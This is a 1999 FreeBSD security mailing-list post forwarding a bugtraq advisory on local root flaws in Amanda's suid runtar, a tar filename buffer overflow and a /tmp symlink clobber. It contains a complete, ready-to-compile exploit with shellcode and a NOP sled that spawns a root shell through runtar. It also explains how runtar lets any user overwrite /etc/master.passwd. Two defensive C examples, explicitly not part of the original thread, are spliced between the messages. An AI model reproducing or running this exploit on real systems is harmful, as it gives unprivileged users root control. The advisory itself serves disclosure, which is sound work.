Date:      Tue, 2 Nov 1999 11:18:06 -0500 (EST)
From:      Robert Watson <robert@cyrus.watson.org>
To:        freebsd-security@FreeBSD.ORG
Cc:        "Tellier, Brock" <btellier@USA.NET>, gpalmer@FreeBSD.ORG, cwt@FreeBSD.ORG
Subject:   Buffer overflow in tar, amanda permissions/symlinks (was: bugtraq: , Amanda multiple vendor local root compromises (fwd))
Message-ID:  <Pine.BSF.3.96.991102104405.27878F-100000@fledge.watson.org>


In the bugtraq message below, Brock Tellier outlines an attack based on a
number of security issues in FreeBSD.  The first has to do with our packaging
of Amanda, which introduces weaker security constraints than the default
Amanda installation from the developer.  The second has to do with a
buffer overflow vulnerability in tar (more serious, I think), and the
third is a bug strictly in Amanda (that manifests itself on BSD also).

The tar bug concerns me a lot--I'm not sure how well audited the tar code
is, but a lot of people expect that they can untar a tar file from an
untrusted third party and not give up all their privileges to that party.
This bug has to do with the length of the filename--a four hundred letter
long filename is sure to arouse some suspicion, if it is handled manually,
but this might imply the existence of other buffer overflows in the file,
and cause trouble for anyone who accepts tarballs in some automated manner
and then untars them automatically.  I don't know how the OpenBSD tar and
our tar differ, but it might be worthwhile to compare them, as needless to
say their code is extremely well audited for buffer-overflow sorts of
bugs.

The symlink bug is a problem for the Amanda maintainers, and it is presumably
a question of using mktemp().  I don't have contact information for them,
but hopefully they read bugtraq or someone can forward this or the
original message to them.

  Robert N M Watson 

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37  ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services
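The temporary-file point raised above, as an added example that is not part of this thread or of Amanda's code: a debug-file open that a pre-planted symlink cannot redirect, plus a constructed check of that behaviour. It assumes a POSIX system with O_NOFOLLOW and mkdtemp; the directory and file names are made up.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Create a brand-new file for debug output.  O_CREAT|O_EXCL fails if
 * anything, including a symlink, already sits at that name, and
 * O_NOFOLLOW refuses to go through a symlink at all, so a planted
 * /tmp/amandad.debug -> <victim> link can never be written through.
 * Returns an fd >= 0 on success, -1 with errno set otherwise. */
int open_debug_file(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario (not from the advisory): a victim file and a
 * planted symlink named like the daemon's debug file, inside a private
 * directory made with mkdtemp.  Returns 1 if the symlinked name is
 * refused with EEXIST/ELOOP, the victim keeps its contents, and a fresh
 * name is still created normally; 0 on any other outcome. */
int demo_symlink_refused(void) {
    char dir[] = "/tmp/amanda-demo-XXXXXX";
    char victim[256], planted[256], fresh[256], buf[16] = {0};
    int fd, ok = 1;
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(planted, sizeof planted, "%s/amandad.debug", dir);
    snprintf(fresh, sizeof fresh, "%s/amandad.debug.%ld", dir, (long)getpid());

    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "secret\n", 7) != 7) return 0;
    close(fd);
    if (symlink(victim, planted) != 0) return 0;   /* the planted link */

    fd = open_debug_file(planted);                 /* must be refused */
    if (fd >= 0) { ok = 0; close(fd); }
    else if (errno != EEXIST && errno != ELOOP) ok = 0;

    fd = open(victim, O_RDONLY);                   /* victim untouched? */
    if (fd < 0 || read(fd, buf, 7) != 7 || strcmp(buf, "secret\n") != 0) ok = 0;
    if (fd >= 0) close(fd);

    fd = open_debug_file(fresh);                   /* fresh name: fine */
    if (fd < 0) ok = 0; else close(fd);

    unlink(fresh); unlink(planted); unlink(victim); rmdir(dir);
    return ok;
}
```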

---------- Forwarded message ----------
Date: Sat, 30 Oct 1999 23:14:25 -0700
From: "Tellier, Brock" <btellier@USA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Amanda multiple vendor local root compromises

Greetings,

OVERVIEW:
The Amanda backup package has several vulnerabilities which
will allow any user to gain root privs.

BACKGROUND:
My tests were done ONLY on FreeBSD 3.3-RELEASE, though this is almost
certainly not the only vulnerable OS.  A search for "amanda-2 and not
freebsd" on altavista yields preliminary, unconfirmed data that some of
the vulnerable OS's (based on packages that are included on install
CD's, anyone can install Amanda to make themselves vulnerable) may be:
RedHat ?.?, TurboLinux, PowerTools CD, SuSE 6.2.  Confirmation on which
OS's/tar's are vulnerable would be useful.

DETAILS:

Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls
/usr/bin/tar and passes all args given to runtar to this program. Tar is
thus run with root permissions and is vulnerable to all of the same
attacks on suid programs that it would have if it were suid itself.

Vuln #1 - run tar as root

Since tar is run with root permissions, you are free to tar up any file
you wish, including /etc/master.passwd.  You may also untar any file you
wish, to any location on the system, including /etc/master.passwd.  This
does not require any exploit kung-fu and may be done by supplying args
to tar/runtar as if you were root.

Vuln #1.1 - tar contains a buffer overflow

Obtaining root via buffer overflow here is redundant, of course, but it
illustrates the point that even if tar's capabilities weren't able to
gain root privs, the buffer overflow would still allow you to do so. An
overflow exists *IN TAR* which will allow any user to execute commands as
root.  Note that an overflow in tar isn't an immediate security flaw
since it is never suid/sgid, but it goes to show that one should do
security audits of all the programs one calls with user input. By
passing a long string to runtar in the form
"/usr/local/libexec/amanda/runtar cvf $400bytes:bah" we can execute our
commands.  FreeBSD exploit attached below.

Vuln #2 - symlink problem

Not quite as serious, but a concern nonetheless.  When the amandad
daemon is run, a bin-owned file called "amandad.debug" is created in
/tmp.  By creating a symlink from /tmp/amandad.debug to any other file,
we will force amandad to clobber the contents with that of amandad's
debug info.  Note that amandad is not suid/sgid, but it is often run
with root perms at startup or via scripts.

WHO IS VULNERABLE:
Anyone running a suid version of runtar should be suspicious.  I've not
tested any other O.S.'s except FreeBSD 3.3, which includes amanda 2.3.0
and 2.4.1 as "additional packages" on the install CD and tar-1.11.2.


EXPLOIT:

/*
 * Amanda runtar exploit yields euid=0(root)
 * Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
 * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
 * platforms
 *
 * Compile gcc -o amandax amandax.c
 * Run ./amandax <offset> <buflen>
 * keep buflen around 400, try positive and negative offsets
 *
 * Brock Tellier btellier@usa.net
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

char fbsdshell[]= /* mudge@lopht.com */
  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
  "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
  "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
  "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

#define LEN 400
#define NOP 0x90
#define ALIGN 3
#define OFFSET 0
#define ADDR 0xbfbfdd90 /* fbsd 3.3 */

int main(int argc, char *argv[]) {

long int offset=OFFSET;

int i;
int buflen = LEN;
long int addr = ADDR;
char buf[LEN];

if (argc > 1) offset = atoi(argv[1]);
if (argc > 2) buflen = atoi(argv[2]);
if (argc > 3) {
  fprintf(stderr, "Usage: %s <offset> <buflen>\n", argv[0]);
  exit(0);
}
if (buflen > LEN) buflen = LEN;   /* buf is only LEN bytes */

fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
fprintf(stderr, "Using addr: 0x%lx\t buflen: %d\t offset: %ld\n",
        addr+offset, buflen, offset);

/* NOP sled, shellcode at offset 100, then the guessed address repeated */
memset(buf,NOP,buflen);
memcpy(buf+100,fbsdshell,strlen(fbsdshell));
for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)*(int *)&buf[i]=addr+offset;

/* runtar passes the argument straight through to tar */
execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
      NULL);

exit(0);
}

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
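The wrapper pattern from Vuln #1 with an argument allow-list, added here as an example; it is not Amanda's runtar and its policy (a fixed "cvf" mode, archives only under BACKUP_ROOT, no options, no ':' since GNU tar treats an archive name containing one as a remote host:file, nothing longer than the fixed tar name field) is assumed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define NAME_LIMIT  99               /* classic tar header name field: 100 bytes */
#define BACKUP_ROOT "/var/backups/"  /* assumed: archives may only land here */

/* Hypothetical allow-list for a setuid wrapper that execs tar.  Accepts only
 *   wrapper cvf <archive under BACKUP_ROOT> <path>...
 * and rejects option-looking arguments, ".." components, any ':' (GNU tar
 * reads "host:file" as a remote archive) and anything longer than the
 * fixed tar name field.  Returns 1 when argv is acceptable, 0 otherwise. */
int wrapper_args_allowed(int argc, char *const argv[]) {
    if (argc < 4 || strcmp(argv[1], "cvf") != 0) return 0;
    if (strncmp(argv[2], BACKUP_ROOT, strlen(BACKUP_ROOT)) != 0) return 0;
    for (int i = 2; i < argc; i++) {
        const char *a = argv[i];
        size_t n = strlen(a);
        if (n == 0 || n > NAME_LIMIT) return 0;
        if (a[0] == '-' || strchr(a, ':') != NULL || strstr(a, "..") != NULL)
            return 0;
    }
    return 1;
}

int main(int argc, char *argv[]) {
    if (!wrapper_args_allowed(argc, argv)) {
        fprintf(stderr, "%s: arguments rejected\n", argv[0]);
        return 1;
    }
    /* Minimal, fixed environment so tar cannot be steered via TAPE, RSH, etc. */
    char *const env[] = { "PATH=/bin:/usr/bin", NULL };
    argv[0] = "tar";
    execve("/usr/bin/tar", argv, env);   /* absolute path, no shell */
    perror("execve");
    return 1;
}
```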


